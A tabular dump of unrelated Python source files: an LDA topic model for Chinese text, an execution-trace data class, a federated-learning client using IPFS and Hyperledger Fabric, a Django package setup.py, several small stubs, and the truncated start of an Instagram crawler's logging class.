ext | sha | content
---|---|---|
py | b4158edb8cfa35c2f23a508eaa8354f0b1caa189 | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 27 16:29:00 2019
@author: Yoi
"""
import numpy as np
import lda
import lda.datasets
import jieba
import codecs
from text_parse import TEXT_parse
from cart_text_jieba import CART_text_jieba
class LDA_model():
def __init__(self, topics=2):
self.n_topic = topics
self.corpus = None
self.vocab = None
self.ppCountMatrix = None
self.stop_words = [u',', u'。', u'、', u'(', u')', u'·', u'!', u' ', u':', u'“', u'”', u'\n']
self.model = None
def loadCorpusFromFile(self, fn,stop_words):
# Chinese word segmentation with jieba
f = open(fn, 'r',encoding = 'utf-8')
text = f.readlines()
text = r' '.join(text)
seg_generator = jieba.cut(text)
seg_list = [i for i in seg_generator if i not in stop_words]
#print(seg_list)
seg_list = r' '.join(seg_list)
# Split the text and collect every distinct word into the vocabulary
seglist = seg_list.split(" ")
self.vocab = []
for word in seglist:
if (word != u' ' and word not in self.vocab):
self.vocab.append(word)
CountMatrix = []
f.seek(0, 0)
# Count term frequencies for each document (one document per line)
for line in f:
# Reset the count vector to zero
count = np.zeros(len(self.vocab), dtype=int)
text = line.strip()
# The line still has to be segmented first
seg_generator = jieba.cut(text)
seg_list = [i for i in seg_generator if i not in stop_words]
seg_list = r' '.join(seg_list)
seglist = seg_list.split(" ")
# Accumulate counts for words found in the vocabulary
for word in seglist:
if word in self.vocab:
count[self.vocab.index(word)] += 1
CountMatrix.append(count)
f.close()
#self.ppCountMatrix = (len(CountMatrix), len(self.vocab))
self.ppCountMatrix = np.array(CountMatrix)
print("load corpus from %s success!"%fn)
# Set the stop-word list
def setStopWords(self, word_list):
self.stop_words = word_list
# Fit the LDA model
def fitModel(self, n_iter = 1500, _alpha = 0.1, _eta = 0.01):
self.model = lda.LDA(n_topics=self.n_topic, n_iter=n_iter, alpha=_alpha, eta= _eta, random_state= 1)
self.model.fit(self.ppCountMatrix)
def printTopic_Word(self, n_top_word = 8):
for i, topic_dist in enumerate(self.model.topic_word_):
topic_words = np.array(self.vocab)[np.argsort(topic_dist)][:-(n_top_word + 1):-1]
print("Topic:" + str(i) + "\n")
for word in topic_words:
if word == "":
continue
print(word + " " + str(topic_dist[self.vocab.index(word)]) + "\n")
print("\n")
# Save the vocabulary
def saveVocabulary(self, fn):
f = codecs.open(fn, 'w', 'utf-8')
for word in self.vocab:
f.write("%s\n"%word)
f.close()
# Write the topic-to-word mapping to a TXT file
def saveTopic_Words(self, fn, n_top_word = 10):
if n_top_word==-1:
n_top_word = len(self.vocab)
f = codecs.open(fn, 'w', 'utf-8')
for i, topic_dist in enumerate(self.model.topic_word_):
topic_words = np.array(self.vocab)[np.argsort(topic_dist)][:-(n_top_word + 1):-1]
f.write( "Topic:%d\n"%i)
for word in topic_words:
if word == "":
continue
f.write(word + " " + str(topic_dist[self.vocab.index(word)]) + "\n")
f.write("\n")
f.close()
# Write each document's topic probability distribution to a TXT file
def saveDoc_Topic(self, fn):
f = codecs.open(fn, 'w', 'utf-8')
for i in range(len(self.ppCountMatrix)):
f.write("Doc %d:((top topic:%s) topic distribution:%s)\n" % (i, self.model.doc_topic_[i].argmax(), self.model.doc_topic_[i]))
f.close()
# Write each document's top topic to a TXT file
def saveDoc_Address(self, fn):
f = codecs.open(fn, 'w', 'utf-8')
for i in range(len(self.ppCountMatrix)):
f.write("Doc %d:(top topic:%s)\n" % (i, self.model.doc_topic_[i].argmax()))
f.close()
if __name__=="__main__":
dire="datasource/cartdata"
txt="data/cart_text.txt"
cut_txt = "data/cart_text_cut.txt"
stopword = "data/stopword.txt"
text = TEXT_parse(directory=dire,txt_file=txt)
text.parse()
text_jieba = CART_text_jieba(txt_file=txt,jieba_txt=cut_txt)
text_jieba.jieba()
for i in range(5,20,2):
num_topics = i
_lda = LDA_model(topics=num_topics)
file = open(stopword,encoding="utf-8")
stop_words = [line.replace(u'\n', '') for line in file.readlines() if not line.startswith(u'\n')]
#print(stop_words)
_lda.setStopWords(stop_words)
_lda.loadCorpusFromFile(cut_txt,stop_words)
_lda.fitModel(n_iter=1500)
_lda.printTopic_Word(n_top_word=10)
_lda.saveVocabulary('data/result/vocab_' + str(num_topics) + '.txt')
_lda.saveTopic_Words('data/result/topic_word_' + str(num_topics) + '.txt')
_lda.saveDoc_Topic('data/result/doc_topic_' + str(num_topics) + '.txt')
_lda.saveDoc_Address('data/result/doc_address_' + str(num_topics) + '.txt')
'''
ss="长话短说\n就哈哈哈哈"
print(ss.replace(u'\n',''))
print(ss.startswith(u'\n')==False)
stop_words=["长话短说\n","长话短说\n","长话短说\n","长话短说\n","长话短说\n","我\n","在\n",]
seg_generator=jieba.cut("我在做的重庆口味的水煮鱼,老家的重庆渝香辣婆婆水煮鱼都是改良过的")
seg_list = [i for i in seg_generator if i not in stop_words]
print(seg_list)
'''
|
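A minimal usage sketch for the LDA_model class above; the corpus and stop-word file names are placeholders, and the third-party lda and jieba packages are assumed to be installed:

model = LDA_model(topics=5)
with open('stopwords.txt', encoding='utf-8') as f:            # placeholder path, one stop word per line
    stop_words = [line.strip() for line in f if line.strip()]
model.setStopWords(stop_words)
model.loadCorpusFromFile('corpus.txt', stop_words)             # placeholder path, one document per line
model.fitModel(n_iter=500)
model.printTopic_Word(n_top_word=10)
model.saveDoc_Topic('doc_topic.txt')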
py | b41591a64539262b71267bdbfa6161b9185e4af7 | from operator import attrgetter
class TraceData:
"""TraceData class.
Class for storing execution traces and bookmarks.
Attributes:
filename (str): A trace file name.
arch (str): CPU architecture.
ip_name (str): Instruction pointer name
regs (dict): Register names and indexes
trace (list): A list of traced instructions, registers and memory accesses.
bookmarks (list): A list of bookmarks.
"""
def __init__(self):
"""Inits TraceData."""
self.filename = ""
self.arch = ""
self.ip_name = ""
self.regs = {}
self.trace = []
self.bookmarks = []
def clear(self):
"""Clears trace and all data"""
self.trace = []
self.bookmarks = []
def get_trace(self):
"""Returns a full trace
Returns:
list: Trace
"""
return self.trace
def get_reg_index(self, reg_name):
"""Returns a register index
Args:
reg_name (str): Register name
Returns:
int: Register index
"""
try:
return self.regs[reg_name]
except KeyError:
print('Unknown register')
return None
def get_modified_regs(self, row):
"""Returns modfied regs
Args:
row (int): Trace row index
Returns:
list: List of register names
"""
modified_regs = []
reg_values = self.trace[row]["regs"]
next_row = row + 1
if next_row < len(self.trace):
for reg_name, reg_index in self.regs.items():
reg_value = reg_values[reg_index]
next_row_data = self.trace[next_row]
next_reg_value = next_row_data["regs"][reg_index]
if next_reg_value != reg_value:
modified_regs.append(reg_name)
return modified_regs
def get_trace_rows(self, rows):
"""Returns a trace of specified rows
Args:
rows (list): List of trace indexes
Returns:
list: Trace
"""
trace = []
try:
for index in rows:
trace.append(self.trace[int(index)])
except IndexError:
print("Error. Could not get trace rows.")
return trace
def get_instruction_pointer_name(self):
"""Returns an instruction pointer name
Returns:
str: Instruction pointer name
"""
if self.ip_name:
return self.ip_name
ip_name = ""
try:
if "eip" in self.regs:
ip_name = "eip"
elif "rip" in self.regs:
ip_name = "rip"
elif "ip" in self.regs:
ip_name = "ip"
except IndexError:
print("Error. Could not get IP name")
return ip_name
def get_instruction_pointer(self, row):
"""Returns a value of instruction pointer of specified row
Args:
row: Trace index
Returns:
int: Address of instruction
"""
ip = 0
try:
ip_name = self.get_instruction_pointer_name()
reg_index = self.regs[ip_name]
ip = self.trace[row]["regs"][reg_index]
# if ip_name in regs:
# ip = regs[ip_name]
except IndexError:
print("Error. Could not get IP from row " + str(row))
return ip
def set_comment(self, comment, row):
"""Adds a comment to trace
Args:
comment (str): Comment text
row (int): Trace index
"""
try:
self.trace[row]["comment"] = str(comment)
except IndexError:
print("Error. Could not set comment to row " + str(row))
def add_bookmark(self, new_bookmark, replace=False):
"""Adds a new bookmark
Args:
new_bookmark (Bookmark): A new bookmark
replace (bool): Replace an existing bookmark if found on same row?
Defaults to False.
"""
for i, bookmark in enumerate(self.bookmarks):
if self.bookmarks[i].startrow == new_bookmark.startrow:
if replace:
self.bookmarks[i] = new_bookmark
print("Bookmark at %s replaced." % bookmark.startrow)
else:
print("Error: bookmark at %s already exists." % bookmark.startrow)
return
self.bookmarks.append(new_bookmark)
self.sort_bookmarks()
def delete_bookmark(self, index):
"""Deletes a bookmark
Args:
index (int): Index on bookmark list
Returns:
bool: True if bookmark deleted, False otherwise
"""
try:
del self.bookmarks[index]
except IndexError:
print("Error. Could not delete a bookmark " + str(index))
return False
return True
def sort_bookmarks(self):
"""Sorts bookmarks by startrow"""
self.bookmarks.sort(key=attrgetter("startrow"))
def get_bookmark_from_row(self, row):
"""Returns a bookmark for a given trace row.
Args:
row (int): Trace row index
Returns:
Bookmark: Returns A Bookmark if found, None otherwise.
"""
for bookmark in self.bookmarks:
if bookmark.startrow <= row <= bookmark.endrow:
return bookmark
return None
def get_bookmarks(self):
"""Returns all bookmarks
Returns:
list: List of bookmarks
"""
return self.bookmarks
def set_bookmarks(self, bookmarks):
"""Sets bookmarks
Args:
bookmarks (list): Bookmarks
"""
self.bookmarks = bookmarks
def clear_bookmarks(self):
"""Clears bookmarks"""
self.bookmarks = []
|
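A small illustrative sketch of how TraceData's register bookkeeping fits together; the register layout, addresses, and values below are invented for the example:

td = TraceData()
td.regs = {"eip": 0, "eax": 1}          # register name -> index into each row's "regs" list
td.trace = [
    {"regs": [0x401000, 5], "comment": ""},
    {"regs": [0x401003, 7], "comment": ""},
]
print(hex(td.get_instruction_pointer(0)))  # 0x401000
print(td.get_modified_regs(0))             # ['eip', 'eax'] - both change between the two rows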
py | b415923cd10c41e85bf97f4e45130c3237df29ca | # -*- coding: utf-8 -*-
# ******************************************************
# Filename : clientRun.py
# Author : Shuo Yuan
# Email : [email protected]
# Blog : https://iyuanshuo.com
# Last modified: 2020-06-18 21:10
# Description :
# ******************************************************
import sys
from dagComps import transaction
import socket
import os
from dagSocket import dagClient
from torch.utils.tensorboard import SummaryWriter
import time
import threading
import shutil
import json
import random
import subprocess
import pickle
import pandas as pd
# Common Components
sys.path.append('../commonComponent')
import usefulTools
## FL related
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import copy
import numpy as np
from torchvision import datasets, transforms
import torch
sys.path.append('../federatedLearning')
from utils.sampling import mnist_iid, mnist_noniid, cifar_iid
from utils.options import args_parser
from models.Update import LocalUpdate
from models.Nets import MLP, CNNMnist, CNNCifar
from models.Fed import FedAvg
from models.test import test_img
import buildModels
import datetime
# Number of tips selected by the leader of shard blockchain
alpha = 3
# Number of tips needs to be kept greater than 3
beta = 3
# Number of tips confirmed by the new transaction
gamma = 2
# Index of shard network
nodeNum = 1
# Rounds trained in shard
# shard_round = 4
# shell envs of Org1
fabricLocation = "export FabricL=/home/shawn/Documents/fabric-samples/test-network"
shellEnv1 = "export PATH=${FabricL}/../bin:$PATH"
shellEnv2 = "export FABRIC_CFG_PATH=${FabricL}/../config/"
shellEnv3 = "export CORE_PEER_TLS_ENABLED=true"
shellEnv4 = "export CORE_PEER_LOCALMSPID=\"Org1MSP\""
shellEnv5 = "export CORE_PEER_TLS_ROOTCERT_FILE=${FabricL}/organizations/peerOrganizations/org1.example.com/peers/peer0.org1.example.com/tls/ca.crt"
shellEnv6 = "export CORE_PEER_MSPCONFIGPATH=${FabricL}/organizations/peerOrganizations/org1.example.com/users/[email protected]/msp"
shellEnv7 = "export CORE_PEER_ADDRESS=localhost:7051"
oneKeyEnv = shellEnv1 + " && " + shellEnv2 + " && " + shellEnv3 + " && " + shellEnv4 + " && " + shellEnv5 + " && " + shellEnv6 + " && " + shellEnv7
# Acc and Loss of the model trained by shard
nodeTestAcc = []
nodeTestLoss = []
# Acc and Loss on training set
nodeTrainAcc = []
nodeTrainLoss = []
def main(aim_addr='149.129.40.183'):
if os.path.exists('./clientS'):
shutil.rmtree('./clientS')
os.mkdir('./clientS')
if os.path.exists('./clientS/paras'):
shutil.rmtree('./clientS/paras')
os.mkdir('./clientS/paras')
if os.path.exists('./clientS/paras/apvTrans'):
shutil.rmtree('./clientS/paras/apvTrans')
os.mkdir('./clientS/paras/apvTrans')
if os.path.exists('./clientS/paras/local'):
shutil.rmtree('./clientS/paras/local')
os.mkdir('./clientS/paras/local')
if os.path.exists('./clientS/tipsJson'):
shutil.rmtree('./clientS/tipsJson')
os.mkdir('./clientS/tipsJson')
if os.path.exists('./clientS/apvJson'):
shutil.rmtree('./clientS/apvJson')
os.mkdir('./clientS/apvJson')
# build model
net_glob, args, dataset_train, dataset_test, dict_users = buildModels.modelBuild()
net_glob.train()
## copy weights
w_glob = net_glob.state_dict()
iteration_count = 0
# selected device
## init the list of device name
allDeviceName = []
for i in range(args.num_users):
allDeviceName.append("device"+("{:0>5d}".format(i)))
deviceSelected = []
# Randomly select the devices
# m = max(int(args.frac * args.num_users), 1) # args.frac is the fraction of users
# idxs_users = np.random.choice(range(args.num_users), m, replace=False)
# print('\n**************************** Idxs of selected devices *****************************')
# print('The idxs of selected devices are\n', idxs_users)
# print('*************************************************************************************\n')
# ## Exchange the info of selected device with fabric
# with open('../commonComponent/selectedDeviceIdxs.txt', 'wb') as f:
# pickle.dump(idxs_users, f)
idxs_users = [ 5, 56, 76, 78, 68, 25, 47, 15, 61, 55]
# idxs_users = [60, 37, 27, 70, 79, 34, 18, 88, 57, 98]
# idxs_users = [48, 46, 33, 82, 4, 7, 6, 91, 92, 52]
dateNow = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
basic_acc_list = []
## tensorboard Part
# writer = SummaryWriter()
# writer.add_scalars('Acc', {'Acc_with_Check': 0}, 0)
# tenfig_data = []
# writer.add_scalars('Acc', {'Acc_without_Check': 0}, 0)
# AWOC_fileName = '/root/shard3/data/shard_3_round3_tenfig_data_cnn_20200821135421.csv'
# acc_wo_check_csv = pd.read_csv(AWOC_fileName)
# acc_wo_check_data = np.array(acc_wo_check_csv['shard_3'])
# writer.add_scalars('Loss', {'Loss_with_Check': 1}, 0)
# tenfig_data_loss = []
# writer.add_scalars('Loss', {'Loss_without_Check': 1}, 0)
# LWOC_fileName = '/root/shard3/data/shard_3_round3_tenfig_data_loss_cnn_20200821135421.csv'
# loss_wo_check_csv = pd.read_csv(LWOC_fileName)
# loss_wo_check_data = np.array(loss_wo_check_csv['shard_3'])[1:]
# tensor_iter = 1
## tensorboard part
## Exchange the info of selected device with fabric: dict_user_fileHash:QmTuvPRDGnLm95fL7uxxhvegoWL3Q9YyAUtEsTK5ZetN4W
dict_users_file = "../commonComponent/dict_users.pkl"
dict_userf_fileHash = "QmTuvPRDGnLm95fL7uxxhvegoWL3Q9YyAUtEsTK5ZetN4W"
while 1:
dictUserGetStatus, dictUsersttCodeGet = usefulTools.ipfsGetFile(dict_userf_fileHash, dict_users_file)
print('The filehash of this dict_user is ' + dict_userf_fileHash + ' , and the file is ' + dict_users_file + '!')
if dictUsersttCodeGet == 0:
print(dictUserGetStatus.strip())
print('The dict_user file ' + dict_users_file + ' has been downloaded!\n')
break
else:
print(dictUserGetStatus)
print('\nFailed to download the dict_user file ' + dict_users_file + ' !\n')
with open(dict_users_file, 'rb') as f:
dict_users = pickle.load(f)
for idx in idxs_users:
deviceSelected.append(allDeviceName[idx])
print('\n**************************** Selected devices *****************************')
print('The idxs of selected devices are\n', deviceSelected)
print('*****************************************************************************\n')
while 1:
print('\n\n\n**************************** Iteration %d *****************************'%iteration_count)
# init the task ID
taskID = 'task'+str(random.randint(1,10))+str(random.randint(1,10))+str(random.randint(1,10))+str(random.randint(1,10))
# Choose and require the apv trans
apv_trans_cands = []
if iteration_count == 0:
apv_trans_cands.append('GenesisBlock')
else:
tips_list = 'tip_list'
tips_file = './clientS/tipsJson/iteration-' + str(iteration_count) + '-' + tips_list + '.json'
dagClient.client_tips_require(aim_addr, tips_list, tips_file)
## try to fix the JSONDecodeError
try:
with open(tips_file, encoding='utf-8-sig', errors='ignore', mode='r') as f1:
tips_dict = json.load(f1)
f1.close()
except Exception:
time.sleep(2)
dagClient.client_tips_require(aim_addr, tips_list, tips_file)
with open(tips_file, encoding='utf-8-sig', errors='ignore', mode='r') as f1:
tips_dict = json.load(f1)
f1.close()
if len(tips_dict) <= alpha:
apv_trans_cands = list(tips_dict.keys())
else:
apv_trans_cands = random.sample(tips_dict.keys(), alpha)
print('\n************************* Select Candidates Tips *****************************')
print('The candidates tips are ', apv_trans_cands)
print('********************************************************************************\n')
# Get the trans file and the model paras file
apv_trans_cands_dict = {}
for apvTrans in apv_trans_cands:
apvTransFile = './clientS/apvJson/' + apvTrans + '.json'
dagClient.client_trans_require(aim_addr, apvTrans, apvTransFile)
print('\nThis approved trans is ', apvTrans, ', and the file is ', apvTransFile)
apvTransInfo = transaction.read_transaction(apvTransFile)
apvParasFile = './clientS/paras/apvTrans/iteration-' + str(iteration_count) + '-' + apvTrans + '.pkl'
while 1:
fileGetStatus, sttCodeGet = usefulTools.ipfsGetFile(apvTransInfo.model_para, apvParasFile)
print('The filehash of this approved trans is ' + apvTransInfo.model_para + ', and the file is ' + apvParasFile + '!')
if sttCodeGet == 0:
print(fileGetStatus.strip())
print('The apv parasfile ' + apvParasFile + ' has been downloaded!\n')
break
else:
print(fileGetStatus)
print('\nFailed to download the apv parasfile ' + apvParasFile + ' !\n')
apv_trans_cands_dict[apvTransInfo.name] = float(apvTransInfo.model_acc)
# select tips for aggregation of basic model !!! key function
apv_trans_final = []
if len(apv_trans_cands_dict) == alpha:
sort_dict = sorted(apv_trans_cands_dict.items(),key=lambda x:x[1],reverse=True)
for i in range(gamma):
apv_trans_final.append(sort_dict[i][0])
else:
apv_trans_final = apv_trans_cands
# load the apv paras
w_apv = []
for item in apv_trans_final:
apvParasFile = './clientS/paras/apvTrans/iteration-' + str(iteration_count) + '-' + item + '.pkl'
net_glob.load_state_dict(torch.load(apvParasFile, map_location=torch.device('cpu')))
w_tmp = net_glob.state_dict()
w_apv.append(copy.deepcopy(w_tmp))
if len(w_apv) == 1:
w_glob = w_apv[0]
else:
w_glob = FedAvg(w_apv)
baseParasFile = './clientS/paras/baseModelParas-iter'+str(iteration_count)+'.pkl'
torch.save(w_glob, baseParasFile)
# evaluate the accuracy of the basic model obtained from the DAG
basicModelAcc, basicModelLoss = buildModels.evalua(net_glob, w_glob, dataset_test, args)
basicModelAcc = basicModelAcc.cpu().numpy().tolist()
print("\n************************************")
print("Acc of the basic model in iteration "+str(iteration_count)+" is "+str(basicModelAcc))
print("************************************")
basic_acc_list.append(basicModelAcc)
basicAccDf = pd.DataFrame({'shard_{}'.format(nodeNum):basic_acc_list})
basicAccDf.to_csv("../data/shard_{}_round{}_basic_acc_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# Add the paras file of base model to ipfs network for shard training
while 1:
basefileHash, baseSttCode = usefulTools.ipfsAddFile(baseParasFile)
if baseSttCode == 0:
print('\nThe base mode parasfile ' + baseParasFile + ' has been uploaded!')
print('And the fileHash is ' + basefileHash + '\n')
break
else:
print('Error: ' + basefileHash)
print('\nFailed to uploaded the aggregated parasfile ' + baseParasFile + ' !\n')
# Task release & model aggregation
## Task release
taskEpochs = args.epochs
taskInitStatus = "start"
taskUsersFrac = args.frac
while 1:
taskRelease = subprocess.Popen(args=['../commonComponent/interRun.sh release '+taskID+' '+str(taskEpochs)+' '+taskInitStatus+' '+str(taskUsersFrac)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf-8')
trOuts, trErrs = taskRelease.communicate(timeout=10)
if taskRelease.poll() == 0:
print('*** ' + taskID + ' has been released! ***')
print('*** And the detail of this task is ' + trOuts.strip() + '! ***\n')
break
else:
print(trErrs)
print('*** Failed to release ' + taskID + ' ! ***\n')
time.sleep(2)
## Publish the init base model
### taskEpoch template {"Args":["set","taskID","{"epoch":1,"status":"training","paras":"fileHash"}"]}
while 1:
spcAggModelPublish = subprocess.Popen(args=['../commonComponent/interRun.sh aggregated '+taskID+' 0 training '+basefileHash], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf-8')
aggPubOuts, aggPubErrs = spcAggModelPublish.communicate(timeout=10)
if spcAggModelPublish.poll() == 0:
print('*** The init aggModel of ' + taskID + ' has been published! ***')
print('*** And the detail of the init aggModel is ' + aggPubOuts.strip() + ' ! ***\n')
break
else:
print(aggPubErrs)
print('*** Failed to publish the init aggModel of ' + taskID + ' ! ***\n')
## wait the local train
time.sleep(10)
## Aggregated the local model trained by the selected devices
currentEpoch = 1
aggEchoFileHash = ''
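# aggModelAcc starts as a baseline; local models scoring more than 10 points below it are treated as malicious and skipped below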
aggModelAcc = 50.0
while (currentEpoch <= args.epochs):
flagList = set(copy.deepcopy(deviceSelected))
w_locals = []
while (len(flagList) != 0):
flagSet = set()
ts = []
lock = threading.Lock()
for deviceID in flagList:
localFileName = './clientS/paras/local/' + taskID + '-' + deviceID + '-epoch-' + str(currentEpoch) + '.pkl'
t = threading.Thread(target=usefulTools.queryLocal,args=(lock,taskID,deviceID,currentEpoch,flagSet,localFileName,))
t.start()
ts.append(t)
for t in ts:
t.join()
time.sleep(2)
flagList = flagList - flagSet
for deviceID in deviceSelected:
localFileName = './clientS/paras/local/' + taskID + '-' + deviceID + '-epoch-' + str(currentEpoch) + '.pkl'
## no check
# net_glob.load_state_dict(torch.load(localFileName))
# tmpParas = net_glob.state_dict()
# w_locals.append(copy.deepcopy(tmpParas))
## check the acc of the models trained by selected device & drop the low quality model
canddts_dev_pas = torch.load(localFileName,map_location=torch.device('cpu'))
acc_canddts_dev, loss_canddts_dev = buildModels.evalua(net_glob, canddts_dev_pas, dataset_test, args)
acc_canddts_dev = acc_canddts_dev.cpu().numpy().tolist()
print("Test acc of the model trained by "+str(deviceID)+" is " + str(acc_canddts_dev))
if (acc_canddts_dev - aggModelAcc) < -10:
print(str(deviceID)+" is a malicious device!")
else:
w_locals.append(copy.deepcopy(canddts_dev_pas))
w_glob = FedAvg(w_locals)
aggEchoParasFile = './clientS/paras/aggModel-iter-'+str(iteration_count)+'-epoch-'+str(currentEpoch)+'.pkl'
torch.save(w_glob, aggEchoParasFile)
# evaluate the accuracy on the test set
aggModelAcc, aggModelLoss = buildModels.evalua(net_glob, w_glob, dataset_test, args)
aggModelAcc = aggModelAcc.cpu().numpy().tolist()
# save the acc and loss
nodeTestAcc.append(aggModelAcc)
nodeTestLoss.append(aggModelLoss)
nodeTestAccDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTestAcc})
nodeTestAccDf.to_csv("../data/result/shard_{}_round{}_test_acc_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
nodeTestLossDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTestLoss})
nodeTestLossDf.to_csv("../data/result/shard_{}_round{}_test_loss_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# evaluate the accuracy on the training set
aggModelTrainAcc, aggModelTrainLoss = buildModels.evalua(net_glob, w_glob, dataset_train, args)
aggModelTrainAcc = (aggModelTrainAcc.cpu().numpy().tolist())/100
# save the acc and loss on training set
nodeTrainAcc.append(aggModelTrainAcc)
nodeTrainLoss.append(aggModelTrainLoss)
nodeTrainAccDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTrainAcc})
nodeTrainAccDf.to_csv("../data/result/shard_{}_round{}_train_acc_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
nodeTrainLossDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTrainLoss})
nodeTrainLossDf.to_csv("../data/result/shard_{}_round{}_train_loss_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# add the tensorboard view
# writer.add_scalars('Acc', {'Acc_with_Check': aggModelAcc/100}, tensor_iter)
# writer.add_scalars('Acc', {'Acc_without_Check': acc_wo_check_data[tensor_iter-1]}, tensor_iter)
# tenfig_data.append(aggModelAcc/100)
# tenfig_data_df = pd.DataFrame({'shard_{}'.format(nodeNum):tenfig_data})
# tenfig_data_df.to_csv("../data/shard_{}_round{}_tenfig_data_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# writer.add_scalars('Loss', {'Loss_with_Check': aggModelLoss}, tensor_iter)
# writer.add_scalars('Loss', {'Loss_without_Check': loss_wo_check_data[tensor_iter-1]}, tensor_iter)
# tenfig_data_loss.append(aggModelLoss)
# tenfig_data_loss_df = pd.DataFrame({'shard_{}'.format(nodeNum):tenfig_data_loss})
# tenfig_data_loss_df.to_csv("../data/shard_{}_round{}_tenfig_data_loss_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# tensor_iter += 1
print("\n************************************")
print("Acc of the agg model of Round "+str(currentEpoch)+" in iteration "+str(iteration_count)+" is "+str(aggModelAcc))
print("************************************")
# aggEchoParasFile is the paras of this sharding trained in current epoch
# Add the aggregated paras file to ipfs network
while 1:
aggEchoFileHash, sttCodeAdd = usefulTools.ipfsAddFile(aggEchoParasFile)
if sttCodeAdd == 0:
print('\n*************************')
print('The aggregated parasfile ' + aggEchoParasFile + ' has been uploaded!')
print('And the fileHash is ' + aggEchoFileHash + '!')
print('*************************\n')
break
else:
print('Error: ' + aggEchoFileHash)
print('\nFailed to uploaded the aggregated parasfile ' + aggEchoParasFile + ' !\n')
## Publish the aggregated model paras trained in this epoch
### taskEpoch template {"Args":["set","taskID","{"epoch":1,"status":"training","paras":"fileHash"}"]}
taskStatus = 'training'
if currentEpoch == args.epochs:
taskStatus = 'done'
while 1:
epochAggModelPublish = subprocess.Popen(args=['../commonComponent/interRun.sh aggregated '+taskID+' '+str(currentEpoch)+' '+taskStatus+' '+aggEchoFileHash], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf-8')
aggPubOuts, aggPubErrs = epochAggModelPublish.communicate(timeout=10)
if epochAggModelPublish.poll() == 0:
print('\n******************')
print('The info of task ' + taskID + ' is ' + aggPubOuts.strip())
print('The model aggregated in epoch ' + str(currentEpoch) + ' for ' + taskID + ' has been published!')
print('******************\n')
break
else:
print(aggPubErrs)
print('*** Failed to publish the Model aggregated in epoch ' + str(currentEpoch) + ' for ' + taskID + ' ! ***\n')
currentEpoch += 1
new_trans = transaction.Transaction(time.time(), nodeNum, aggModelAcc, aggEchoFileHash, apv_trans_final)
# upload the trans to DAG network
dagClient.trans_upload(aim_addr, new_trans)
print('\n******************************* Transaction upload *******************************')
print('The details of this trans are', new_trans)
print('The trans generated in the iteration #%d had been uploaded!'%iteration_count)
print('*************************************************************************************\n')
iteration_count += 1
time.sleep(2)
# writer.close()  # tensorboard SummaryWriter above is disabled
if __name__ == '__main__':
main('192.168.2.12') |
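The tip-selection branch in main() above (rank the alpha candidate tips fetched from the DAG by model accuracy and approve the best gamma of them) is easier to read in isolation. The sketch below restates just that logic with made-up transaction names and accuracies; it is not part of the original script:

def select_tips(candidates, alpha=3, gamma=2):
    """candidates: dict mapping tip/transaction name -> model accuracy."""
    if len(candidates) == alpha:
        # Full candidate set: keep the gamma most accurate tips.
        ranked = sorted(candidates.items(), key=lambda kv: kv[1], reverse=True)
        return [name for name, _acc in ranked[:gamma]]
    # Fewer candidates than alpha: approve them all, as main() does.
    return list(candidates)

# Hypothetical accuracies for three candidate tips.
print(select_tips({"tx1": 91.2, "tx2": 88.7, "tx3": 93.5}))  # ['tx3', 'tx1']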
py | b415935f0f619ec55cdd463f9ca003497e7dd417 | name = 'usain'
message = "Hello " + name.title() + ", are you faster than lightning?"
print (message) |
py | b415940e861896b14f5899baeb24e71b9c80e8c0 | # from .dualpath import DualData, DualData25, DualData28
from .singlepath import SingleData, SingleData25, SingleData28
|
py | b415951b4b54305a92bf3c4147edd260a17b5b52 | class SerialConnection(object):
def __init__(self):
raise NotImplementedError("This class is a stub") |
py | b415953a21c18d696f7d7f0c5bb996748666bb1f | from setuptools import find_packages, setup
import djangocms_versioning_filer
CLASSIFIERS = [
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Framework :: Django',
'Framework :: Django :: 1.11',
'Framework :: Django :: 2.0',
'Framework :: Django :: 2.1',
]
INSTALL_REQUIREMENTS = [
'Django>=1.11,<2.2',
# 'django-filer', # new version not released
# 'djangocms-versioning', # not released
# 'django-cms>=4.0', # not released
]
setup(
name='djangocms-versioning-filer',
author='Divio AG',
author_email='[email protected]',
url='http://github.com/divio/djangocms-versioning-filer',
license='BSD',
version=djangocms_versioning_filer.__version__,
description=djangocms_versioning_filer.__doc__,
long_description=open('README.rst').read(),
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIREMENTS,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='test_settings.run',
)
|
py | b4159579250a88b9e356447214d19ab31a2136e6 | from __future__ import unicode_literals
import glob
import json
import os
import re
import sys
import time
import traceback
from builtins import open
from time import sleep
from tqdm import tqdm
from . import secret
from .browser import Browser
from .exceptions import RetryException
from .fetch import fetch_caption
from .fetch import fetch_comments
from .fetch import fetch_datetime
from .fetch import fetch_details
from .fetch import fetch_imgs
from .fetch import fetch_likers
from .fetch import fetch_likes_plays
from .utils import instagram_int
from .utils import randmized_sleep
from .utils import retry
class Logging(object):
PREFIX = "instagram-crawler"
def __init__(self):
try:
timestamp = int(time.time())
self.cleanup(timestamp)
self.logger = open("/tmp/%s-%s.log" % (Logging.PREFIX, timestamp), "w")
